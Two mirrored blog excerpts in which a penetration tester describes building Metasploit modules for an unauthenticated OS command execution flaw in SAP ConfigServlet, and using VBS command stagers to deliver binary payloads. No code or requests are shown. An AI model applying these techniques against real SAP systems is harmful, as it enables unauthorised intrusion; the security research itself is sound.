Mirrored from my previous site, original URL was: http://blog.kabaiandras.hu/2013/04/sap-configservlet-remote-code-execution.html

Still SAP, still the same OS command execution vulnerability I mentioned in my previous post. But what is the difference? Well, it is good if you can run OS commands on the target system but probably you would like something more. Yes, I am talking about binary payloads.

After making my SAP ConfigServlet OS Command Execution metasploit module, I started to create a new module for remote code execution.

As it is possible to execute OS commands through the ConfigServlet it is relatively easy to deliver binary payloads and execute them through metasploit’s command stagers. These stagers convert the binary payloads to ASCII deliverable format and use OS commands to write out the payload and the stager line by line and finally execute the payload through the dropped stager. Because VBS is more common in windows environment than PS I chose CmdStagerVBS.

Continue reading →

Mirrored from my previous site, original URL was: http://blog.kabaiandras.hu/2013/04/sap-configservlet-os-command-execution.html

If you ever tried to search for SAP vulnerabilities then I am sure you met some form of ERPScan’s team awesome researches. This happened in our current pentest project as well. A colleague of mine identified several SAP systems in the target network range and we tried to find well known vulnerabilities for them.

We found a great presentation (Breaking SAP Portal) from Hacker Halted 2012 by Dmitry Chastuchin from ERPScan. One of the slides contains a very interesting screenshot about an exploitation of a simple, remote, authentication less OS command execution vulnerability. Yes, with a simple GET request it is possible to execute OS commands on the remote system. I tried to search for existing exploit implementations for this vulnerability but there were no public metasploit or other exploits available. Surprisingly not just exploits were not available but there were no relevant search results to this vulnerability so I decided to create a metasploit module for that.

Continue reading →